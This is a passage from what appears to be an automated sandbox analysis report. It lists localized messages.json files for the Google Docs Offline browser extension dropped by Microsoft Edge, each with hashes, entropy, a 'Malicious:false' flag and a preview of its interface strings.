                                                                                                                                          SHA1:2D0E4587DDD4BAC1C90E79A88AF3BD2C140B53B1
                                                                                                                                          SHA-256:A41670D52423BA69C7A65E7E153E7B9994E8DD0370C584BDA0714BD61C49C578
                                                                                                                                          SHA-512:B7B7A5A0AA8F6724B0FA15D65F25286D9C66873F03080CBABA037BDEEA6AADC678AC4F083BC52C2DB01BEB1B41A755ED67BBDDB9C0FE4E35A004537A3F7FC458
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"SORTU"},"explanationofflinedisabled":{"message":"Ez zaude konektatuta Internetera. Google Dokumentuak konexiorik gabe erabiltzeko, joan Google Dokumentuak zerbitzuaren orri nagusiko ezarpenetara eta aktibatu konexiorik gabeko sinkronizazioa Internetera konektatzen zaren hurrengoan."},"explanationofflineenabled":{"message":"Ez zaude konektatuta Internetera, baina erabilgarri dauden fitxategiak edita ditzakezu, baita beste batzuk sortu ere."},"extdesc":{"message":"Editatu, sortu eta ikusi dokumentuak, kalkulu-orriak eta aurkezpenak Interneteko konexiorik gabe."},"extname":{"message":"Google Dokumentuak konexiorik gabe"},"learnmore":{"message":"Lortu informazio gehiago"},"popuphelptext":{"message":"Edonon zaudela ere, ez duzu zertan konektatuta egon idatzi, editatu eta lankidetzan jardun ahal izateko."}}.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\fa\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1305
                                                                                                                                          Entropy (8bit):4.673517697192589
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAX9yM7oiI99Rwx4xyQakJbfAEJhmq/RlBu92P7FbNcgYVJ0:JM7ovex4xyQaKjAEyq/p7taX0
                                                                                                                                          MD5:097F3BA8DE41A0AAF436C783DCFE7EF3
                                                                                                                                          SHA1:986B8CABD794E08C7AD41F0F35C93E4824AC84DF
                                                                                                                                          SHA-256:7C4C09D19AC4DA30CC0F7F521825F44C4DFBC19482A127FBFB2B74B3468F48F1
                                                                                                                                          SHA-512:8114EA7422E3B20AE3F08A3A64A6FFE1517A7579A3243919B8F789EB52C68D6F5A591F7B4D16CEE4BD337FF4DAF4057D81695732E5F7D9E761D04F859359FADB
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "..... ... ....".. },.. "explanationofflinedisabled": {.. "message": "...... ...... .... ....... .. ....... Google .... ..... ........ .... ... .. .. ....... ... ..... .. ....... .. .... .... ....... Google ..... . .......... ...... .. .... .....".. },.. "explanationofflineenabled": {.. "message": "...... ..... ... ...... ......... ......... .. .. .. ..... ..... ...... .... .. ........ ..... ..... .....".. },.. "extdesc": {.. "message": "...... ............ . ........ .. ....... ..... . ...... .... . ... ... ..... .... ...... .. ........".. },.. "extname": {.. "message": "....... Google .

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\fi\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):911
                                                                                                                                          Entropy (8bit):4.6294343834070935
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvguCBxNMME2BESA7gPQk36xCBxeMMcXYBt+CSU1pfazCBhUunV1tLaX5GI2N:1HAVioESAsPf36O3Xst/p3J8JeEY
                                                                                                                                          MD5:B38CBD6C2C5BFAA6EE252D573A0B12A1
                                                                                                                                          SHA1:2E490D5A4942D2455C3E751F96BD9960F93C4B60
                                                                                                                                          SHA-256:2D752A5DBE80E34EA9A18C958B4C754F3BC10D63279484E4DF5880B8FD1894D2
                                                                                                                                          SHA-512:6E65207F4D8212736059CC802C6A7104E71A9CC0935E07BD13D17EC46EA26D10BC87AD923CD84D78781E4F93231A11CB9ED8D3558877B6B0D52C07CB005F1C0C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "LUO UUSI".. },.. "explanationofflinedisabled": {.. "message": "Olet offline-tilassa. Jos haluat k.ytt.. Google Docsia ilman internetyhteytt., siirry Google Docsin etusivulle ja ota asetuksissa k.ytt..n offline-synkronointi, kun seuraavan kerran olet yhteydess. internetiin.".. },.. "explanationofflineenabled": {.. "message": "Olet offline-tilassa. Voit kuitenkin muokata k.ytett.viss. olevia tiedostoja tai luoda uusia.".. },.. "extdesc": {.. "message": "Muokkaa, luo ja katso dokumentteja, laskentataulukoita ja esityksi. ilman internetyhteytt..".. },.. "extname": {.. "message": "Google Docsin offline-tila".. },.. "learnmore": {.. "message": "Lis.tietoja".. },.. "popuphelptext": {.. "message": "Kirjoita, muokkaa ja tee yhteisty.t. paikasta riippumatta, my.s ilman internetyhteytt..".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\fil\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):939
                                                                                                                                          Entropy (8bit):4.451724169062555
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAXbH2eZXn6sjLITdRSJpGL/gWFJ3sqixO:ubHfZqsHIT/FLL3qO
                                                                                                                                          MD5:FCEA43D62605860FFF41BE26BAD80169
                                                                                                                                          SHA1:F25C2CE893D65666CC46EA267E3D1AA080A25F5B
                                                                                                                                          SHA-256:F51EEB7AAF5F2103C1043D520E5A4DE0FA75E4DC375E23A2C2C4AFD4D9293A72
                                                                                                                                          SHA-512:F66F113A26E5BCF54B9AAFA69DAE3C02C9C59BD5B9A05F829C92AF208C06DC8CCC7A1875CBB7B7CE425899E4BA27BFE8CE2CDAF43A00A1B9F95149E855989EE0
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "GUMAWA NG BAGO".. },.. "explanationofflinedisabled": {.. "message": "Naka-offline ka. Upang magamit ang Google Docs nang walang koneksyon sa internet, pumunta sa mga setting sa homepage ng Google Docs at i-on ang offline na pag-sync sa susunod na nakakonekta ka sa internet.".. },.. "explanationofflineenabled": {.. "message": "Naka-offline ka, ngunit maaari mo pa ring i-edit ang mga available na file o gumawa ng mga bago.".. },.. "extdesc": {.. "message": "I-edit, gawin, at tingnan ang iyong mga dokumento, spreadsheet, at presentation . lahat ng ito nang walang access sa internet.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Matuto Pa".. },.. "popuphelptext": {.. "message": "Magsulat, mag-edit at makipag-collaborate nasaan ka man, nang mayroon o walang koneksyon sa internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\fr\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):977
                                                                                                                                          Entropy (8bit):4.622066056638277
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAdy42ArMdsH50Jd6Z1PCBolXAJ+GgNHp0X16M1J1:EyfArMS2Jd6Z1PCBolX2+vNmX16Y1
                                                                                                                                          MD5:A58C0EEBD5DC6BB5D91DAF923BD3A2AA
                                                                                                                                          SHA1:F169870EEED333363950D0BCD5A46D712231E2AE
                                                                                                                                          SHA-256:0518287950A8B010FFC8D52554EB82E5D93B6C3571823B7CECA898906C11ABCC
                                                                                                                                          SHA-512:B04AFD61DE490BC838354E8DC6C22BE5C7AC6E55386FFF78489031ACBE2DBF1EAA2652366F7A1E62CE87CFCCB75576DA3B2645FEA1645B0ECEB38B1FA3A409E8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour pouvoir utiliser Google.Docs sans connexion Internet, acc.dez aux param.tres de la page d'accueil de Google.Docs et activez la synchronisation hors connexion lors de votre prochaine connexion . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez quand m.me modifier les fichiers disponibles ou cr.er des fichiers.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez des documents, feuilles de calcul et pr.sentations, sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Docs hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": "R.digez des documents, modifiez-les et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\fr_CA\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):972
                                                                                                                                          Entropy (8bit):4.621319511196614
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HAdyg2pwbv1V8Cd61PC/vT2fg3YHDyM1J1:EyHpwbpd61C/72Y3YOY1
                                                                                                                                          MD5:6CAC04BDCC09034981B4AB567B00C296
                                                                                                                                          SHA1:84F4D0E89E30ED7B7ACD7644E4867FFDB346D2A5
                                                                                                                                          SHA-256:4CAA46656ECC46A420AA98D3307731E84F5AC1A89111D2E808A228C436D83834
                                                                                                                                          SHA-512:160590B6EC3DCF48F3EA7A5BAA11A8F6FA4131059469623E00AD273606B468B3A6E56D199E97DAA0ECB6C526260EBAE008570223F2822811F441D1C900DC33D6
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CR.ER".. },.. "explanationofflinedisabled": {.. "message": "Vous .tes hors connexion. Pour utiliser Google.Documents sans connexion Internet, acc.dez aux param.tres sur la page d'accueil Google.Documents et activez la synchronisation hors ligne la prochaine fois que vous .tes connect. . Internet.".. },.. "explanationofflineenabled": {.. "message": "Vous .tes hors connexion, mais vous pouvez toujours modifier les fichiers disponibles ou en cr.er.".. },.. "extdesc": {.. "message": "Modifiez, cr.ez et consultez vos documents, vos feuilles de calcul et vos pr.sentations, le tout sans acc.s . Internet.".. },.. "extname": {.. "message": "Google.Documents hors connexion".. },.. "learnmore": {.. "message": "En savoir plus".. },.. "popuphelptext": {.. "message": ".crivez, modifiez et collaborez o. que vous soyez, avec ou sans connexion Internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\gl\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):990
                                                                                                                                          Entropy (8bit):4.497202347098541
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvggECBxNbWVqMjlMgaPLqXPhTth0CBxebWbMRCSUCjAKFCSIj0tR7tCBhP1l:1HACzWsMlajIhJhHKWbFKFC0tR8oNK5
                                                                                                                                          MD5:6BAAFEE2F718BEFBC7CD58A04CCC6C92
                                                                                                                                          SHA1:CE0BDDDA2FA1F0AD222B604C13FF116CBB6D02CF
                                                                                                                                          SHA-256:0CF098DFE5BBB46FC0132B3CF0C54B06B4D2C8390D847EE2A65D20F9B7480F4C
                                                                                                                                          SHA-512:3DA23E74CD6CF9C0E2A0C4DBA60301281D362FB0A2A908F39A55ABDCA4CC69AD55638C63CC3BEFD44DC032F9CBB9E2FDC1B4C4ABE292917DF8272BA25B82AF20
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREAR NOVO".. },.. "explanationofflinedisabled": {.. "message": "Est.s sen conexi.n. Para utilizar Documentos de Google sen conexi.n a Internet, accede .s opci.ns de configuraci.n na p.xina de inicio de Documentos de Google e activa a sincronizaci.n sen conexi.n a pr.xima vez que esteas conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "Est.s sen conexi.n. A.nda podes editar os ficheiros dispo.ibles ou crear outros novos.".. },.. "extdesc": {.. "message": "Modifica, crea e consulta os teus documentos, follas de c.lculo e presentaci.ns sen necesidade de acceder a Internet.".. },.. "extname": {.. "message": "Documentos de Google sen conexi.n".. },.. "learnmore": {.. "message": "M.is informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, edita e colabora esteas onde esteas, tanto se tes conexi.n a Internet como se non a tes.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\gu\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1658
                                                                                                                                          Entropy (8bit):4.294833932445159
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA3k3FzEVeXWuvLujNzAK11RiqRC2sA0O3cEiZ7dPRFFOPtZdK0A41yG3BczKT3:Q4pE4rCjNjw6/0y+5j8ZHA4PBSKr
                                                                                                                                          MD5:BC7E1D09028B085B74CB4E04D8A90814
                                                                                                                                          SHA1:E28B2919F000B41B41209E56B7BF3A4448456CFE
                                                                                                                                          SHA-256:FE8218DF25DB54E633927C4A1640B1A41B8E6CB3360FA386B5382F833B0B237C
                                                                                                                                          SHA-512:040A8267D67DB05BBAA52F1FAC3460F58D35C5B73AA76BBF17FA78ACC6D3BFB796A870DD44638F9AC3967E35217578A20D6F0B975CEEEEDBADFC9F65BE7E72C9
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".... .....".. },.. "explanationofflinedisabled": {.. "message": "... ...... ... ........ ....... ... Google .......... ..... .... ...., ... .... .... ...... ........ .... ...... ... ...... Google ........ ...... .. ........ .. ... ... ...... ....... .... ....".. },.. "explanationofflineenabled": {.. "message": "... ...... .., ..... ... ... .. ...... ..... ....... ... ... .. .... ... ..... ... ...".. },.. "extdesc": {.. "message": "..... ........., ..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\hi\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1672
                                                                                                                                          Entropy (8bit):4.314484457325167
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:46G2+ymELbLNzGVx/hXdDtxSRhqv7Qm6/7Lm:4GbxzGVzXdDtx+qzU/7C
                                                                                                                                          MD5:98A7FC3E2E05AFFFC1CFE4A029F47476
                                                                                                                                          SHA1:A17E077D6E6BA1D8A90C1F3FAF25D37B0FF5A6AD
                                                                                                                                          SHA-256:D2D1AFA224CDA388FF1DC8FAC24CDA228D7CE09DE5D375947D7207FA4A6C4F8D
                                                                                                                                          SHA-512:457E295C760ABFD29FC6BBBB7FC7D4959287BCA7FB0E3E99EB834087D17EED331DEF18138838D35C48C6DDC8A0134AFFFF1A5A24033F9B5607B355D3D48FDF88
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "... .....".. },.. "explanationofflinedisabled": {.. "message": ".. ...... .... ....... ....... .. .... Google ........ .. ..... .... .. ..., .... ... ....... .. ...... .... .. Google ........ .. ........ .. ...... ... .... .. ...... ....... .... .....".. },.. "explanationofflineenabled": {.. "message": ".. ...... ..., ..... .. .. .. ...... ...... ..... .. .... ... .. .. ...... ... .... ....".. },.. "extdesc": {.. "message": ".... .... ....... ...... ..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\hr\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):935
                                                                                                                                          Entropy (8bit):4.6369398601609735
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA7sR5k/I+UX/hrcySxG1fIZ3tp/S/d6Gpb+D:YsE/I+UX/hVSxQ03f/Sj+D
                                                                                                                                          MD5:25CDFF9D60C5FC4740A48EF9804BF5C7
                                                                                                                                          SHA1:4FADECC52FB43AEC084DF9FF86D2D465FBEBCDC0
                                                                                                                                          SHA-256:73E6E246CEEAB9875625CD4889FBF931F93B7B9DEAA11288AE1A0F8A6E311E76
                                                                                                                                          SHA-512:EF00B08496427FEB5A6B9FB3FE2E5404525BE7C329D9DD2A417480637FD91885837D134A26980DCF9F61E463E6CB68F09A24402805807E656AF16B116A75E02C
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "IZRADI NOVI".. },.. "explanationofflinedisabled": {.. "message": "Vi ste izvan mre.e. Da biste koristili Google dokumente bez internetske veze, idite na postavke na po.etnoj stranici Google dokumenata i uklju.ite izvanmre.nu sinkronizaciju sljede.i put kada se pove.ete s internetom.".. },.. "explanationofflineenabled": {.. "message": "Vi ste izvan mre.e, no i dalje mo.ete ure.ivati dostupne datoteke i izra.ivati nove.".. },.. "extdesc": {.. "message": "Uredite, izradite i pregledajte dokumente, prora.unske tablice i prezentacije . sve bez pristupa internetu.".. },.. "extname": {.. "message": "Google dokumenti izvanmre.no".. },.. "learnmore": {.. "message": "Saznajte vi.e".. },.. "popuphelptext": {.. "message": "Pi.ite, ure.ujte i sura.ujte gdje god se nalazili, povezani s internetom ili izvanmre.no.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\hu\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):1065
                                                                                                                                          Entropy (8bit):4.816501737523951
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:1HA6J54gEYwFFMxv4gvyB9FzmxlsN147g/zJcYwJgrus4QY2jom:NJ54gEYwUmgKHFzmsG7izJcYOgKgYjm
                                                                                                                                          MD5:8930A51E3ACE3DD897C9E61A2AEA1D02
                                                                                                                                          SHA1:4108506500C68C054BA03310C49FA5B8EE246EA4
                                                                                                                                          SHA-256:958C0F664FCA20855FA84293566B2DDB7F297185619143457D6479E6AC81D240
                                                                                                                                          SHA-512:126B80CD3428C0BC459EEAAFCBE4B9FDE2541A57F19F3EC7346BAF449F36DC073A9CF015594A57203255941551B25F6FAA6D2C73C57C44725F563883FF902606
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": ".J L.TREHOZ.SA".. },.. "explanationofflinedisabled": {.. "message": "Jelenleg offline .llapotban van. Ha a Google Dokumentumokat internetkapcsolat n.lk.l szeretn. haszn.lni, a legk.zelebbi internethaszn.lata sor.n nyissa meg a Google Dokumentumok kezd.oldal.n tal.lhat. be.ll.t.sokat, .s tiltsa le az offline szinkroniz.l.s be.ll.t.st.".. },.. "explanationofflineenabled": {.. "message": "Offline .llapotban van, de az el.rhet. f.jlokat .gy is szerkesztheti, valamint l.trehozhat .jakat.".. },.. "extdesc": {.. "message": "Szerkesszen, hozzon l.tre .s tekintsen meg dokumentumokat, t.bl.zatokat .s prezent.ci.kat . ak.r internetkapcsolat n.lk.l is.".. },.. "extname": {.. "message": "Google Dokumentumok Offline".. },.. "learnmore": {.. "message": "Tov.bbi inform.ci.".. },.. "popuphelptext": {.. "message": ".rjon, szerkesszen .s dolgozzon egy.tt m.sokkal

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\hy\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2771
                                                                                                                                          Entropy (8bit):3.7629875118570055
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:Y0Fx+eiYZBZ7K1ZZ/5QQxTuDLoFZaIZSK7lq0iC0mlMO6M3ih1oAgC:lF2BTz6N/
                                                                                                                                          MD5:55DE859AD778E0AA9D950EF505B29DA9
                                                                                                                                          SHA1:4479BE637A50C9EE8A2F7690AD362A6A8FFC59B2
                                                                                                                                          SHA-256:0B16E3F8BD904A767284345AE86A0A9927C47AFE89E05EA2B13AD80009BDF9E4
                                                                                                                                          SHA-512:EDAB2FCC14CABB6D116E9C2907B42CFBC34F1D9035F43E454F1F4D1F3774C100CBADF6B4C81B025810ED90FA91C22F1AEFE83056E4543D92527E4FE81C7889A8
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"\u054d\u054f\u0535\u0542\u053e\u0535\u053c \u0546\u0548\u0550"},"explanationofflinedisabled":{"message":"Google \u0553\u0561\u057d\u057f\u0561\u0569\u0572\u0569\u0565\u0580\u0568 \u0576\u0561\u0587 \u0561\u0576\u0581\u0561\u0576\u0581 \u057c\u0565\u056a\u056b\u0574\u0578\u0582\u0574 \u0585\u0563\u057f\u0561\u0563\u0578\u0580\u056e\u0565\u056c\u0578\u0582 \u0570\u0561\u0574\u0561\u0580 \u0574\u056b\u0561\u0581\u0565\u0584 \u0570\u0561\u0574\u0561\u0581\u0561\u0576\u0581\u056b\u0576, \u0562\u0561\u0581\u0565\u0584 \u056e\u0561\u057c\u0561\u0575\u0578\u0582\u0569\u0575\u0561\u0576 \u0563\u056c\u056d\u0561\u057e\u0578\u0580 \u0567\u057b\u0568, \u0561\u0576\u0581\u0565\u0584 \u056f\u0561\u0580\u0563\u0561\u057e\u0578\u0580\u0578\u0582\u0574\u0576\u0565\u0580 \u0587 \u0574\u056b\u0561\u0581\u0580\u0565\u0584 \u0561\u0576\u0581\u0561\u0576\u0581 \u0570\u0561\u0574\u0561\u056a\u0561\u0574\u0561\u0581\u0578\u0582\u0574\u0568:"},"explanationofflineenabled":{"message":"\u

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\id\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):858
                                                                                                                                          Entropy (8bit):4.474411340525479
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvgJX4CBxNpXemNOAJRFqjRpCBxedIdjTi92OvbCSUuoi01uRwCBhUuvz1thK:1HARXzhXemNOQWGcEoeH1eXJNvT2
                                                                                                                                          MD5:34D6EE258AF9429465AE6A078C2FB1F5
                                                                                                                                          SHA1:612CAE151984449A4346A66C0A0DF4235D64D932
                                                                                                                                          SHA-256:E3C86DDD2EFEBE88EED8484765A9868202546149753E03A61EB7C28FD62CFCA1
                                                                                                                                          SHA-512:20427807B64A0F79A6349F8A923152D9647DA95C05DE19AD3A4BF7DB817E25227F3B99307C8745DD323A6591B515221BD2F1E92B6F1A1783BDFA7142E84601B1
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "BUAT BARU".. },.. "explanationofflinedisabled": {.. "message": "Anda sedang offline. Untuk menggunakan Google Dokumen tanpa koneksi internet, buka setelan di beranda Google Dokumen dan aktifkan sinkronisasi offline saat terhubung ke internet.".. },.. "explanationofflineenabled": {.. "message": "Anda sedang offline, namun Anda masih dapat mengedit file yang tersedia atau membuat file baru.".. },.. "extdesc": {.. "message": "Edit, buat, dan lihat dokumen, spreadsheet, dan presentasi . tanpa perlu akses internet.".. },.. "extname": {.. "message": "Google Dokumen Offline".. },.. "learnmore": {.. "message": "Pelajari Lebih Lanjut".. },.. "popuphelptext": {.. "message": "Tulis, edit, dan gabungkan di mana saja, dengan atau tanpa koneksi internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\is\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):954
                                                                                                                                          Entropy (8bit):4.631887382471946
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:YGXU2rOcxGe+J97f9TP2DBX9tMfxqbTMvOfWWgdraqlifVpm0Ekf95MwP9KkJ+je:YwBrD2J2DBLMfFuWvdpY94vioO+uh
                                                                                                                                          MD5:1F565FB1C549B18AF8BBFED8DECD5D94
                                                                                                                                          SHA1:B57F4BDAE06FF3DFC1EB3E56B6F2F204D6F63638
                                                                                                                                          SHA-256:E16325D1A641EF7421F2BAFCD6433D53543C89D498DD96419B03CBA60B9C7D60
                                                                                                                                          SHA-512:A60B8E042A9BCDCC136B87948E9924A0B24D67C6CA9803904B876F162A0AD82B9619F1316BE9FF107DD143B44F7E6F5DF604ABFE00818DEB40A7D62917CDA69F
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{"createnew":{"message":"B\u00daA TIL N\u00ddTT"},"explanationofflinedisabled":{"message":"\u00de\u00fa ert \u00e1n nettengingar. Til a\u00f0 nota Google skj\u00f6l \u00e1n nettengingar skaltu opna stillingarnar \u00e1 heimas\u00ed\u00f0u Google skjala og virkja samstillingu \u00e1n nettengingar n\u00e6st \u00feegar \u00fe\u00fa tengist netinu."},"explanationofflineenabled":{"message":"Engin nettenging. \u00de\u00fa getur samt sem \u00e1\u00f0ur breytt tilt\u00e6kum skr\u00e1m e\u00f0a b\u00fai\u00f0 til n\u00fdjar."},"extdesc":{"message":"Breyttu, b\u00fa\u00f0u til og sko\u00f0a\u00f0u skj\u00f6lin \u00fe\u00edn, t\u00f6flureikna og kynningar \u2014 allt \u00e1n nettengingar."},"extname":{"message":"Google skj\u00f6l \u00e1n nettengingar"},"learnmore":{"message":"Frekari uppl\u00fdsingar"},"popuphelptext":{"message":"Skrifa\u00f0u, breyttu og starfa\u00f0u me\u00f0 \u00f6\u00f0rum hvort sem nettenging er til sta\u00f0ar e\u00f0a ekki."}}.

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\it\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):899
                                                                                                                                          Entropy (8bit):4.474743599345443
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:12:1HASvggrCBxNp8WJOJJrJ3WytVCBxep3bjP5CSUCjV8AgJJm2CBhr+z1tWgjqEOW:1HANXJOTBFtKa8Agju4NB3j
                                                                                                                                          MD5:0D82B734EF045D5FE7AA680B6A12E711
                                                                                                                                          SHA1:BD04F181E4EE09F02CD53161DCABCEF902423092
                                                                                                                                          SHA-256:F41862665B13C0B4C4F562EF1743684CCE29D4BCF7FE3EA494208DF253E33885
                                                                                                                                          SHA-512:01F305A280112482884485085494E871C66D40C0B03DE710B4E5F49C6A478D541C2C1FDA2CEAF4307900485946DEE9D905851E98A2EB237642C80D464D1B3ADA
                                                                                                                                          Malicious:false
                                                                                                                                          Preview:{.. "createnew": {.. "message": "CREA NUOVO".. },.. "explanationofflinedisabled": {.. "message": "Sei offline. Per utilizzare Documenti Google senza una connessione Internet, apri le impostazioni nella home page di Documenti Google e attiva la sincronizzazione offline la prossima volta che ti colleghi a Internet.".. },.. "explanationofflineenabled": {.. "message": "Sei offline, ma puoi comunque modificare i file disponibili o crearne di nuovi.".. },.. "extdesc": {.. "message": "Modifica, crea e visualizza documenti, fogli di lavoro e presentazioni, senza accesso a Internet.".. },.. "extname": {.. "message": "Documenti Google offline".. },.. "learnmore": {.. "message": "Ulteriori informazioni".. },.. "popuphelptext": {.. "message": "Scrivi, modifica e collabora ovunque ti trovi, con o senza una connessione Internet.".. }..}..

                                                                                                                                          C:\Users\user\AppData\Local\Temp\scoped_dir7820_847441523\CRX_INSTALL\_locales\iw\messages.json

                                                                                                                                          Download File
                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):2230
                                                                                                                                          Entropy (8bit):3.8239097369647634
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:24:YIiTVLrLD1MEzMEH82LBLjO5YaQEqLytLLBm3dnA5LcqLWAU75yxFLcx+UxWRJLI:YfTFf589rZNgNA12Qzt4/zRz2vc
                                                                                                                                          MD5:26B1533C0852EE4661EC1A27BD87D6BF
                                                                                                                                          SHA1:18234E3ABAF702DF9330552780C2F33B83A1188A
                                                                                                                                          SHA-256:BBB81C32F482BA3216C9B1189C70CEF39CA8C2181AF3538FFA07B4C6AD52F06A
                                                                                                                                          SHA-512:450BFAF0E8159A4FAE309737EA69CA8DD91CAAFD27EF662087C4E7716B2DCAD3172555898E75814D6F11487F4F254DE8625EF0CFEA8DF0133FC49E18EC7FD5D2
                                                                                                                                          Malicious:false
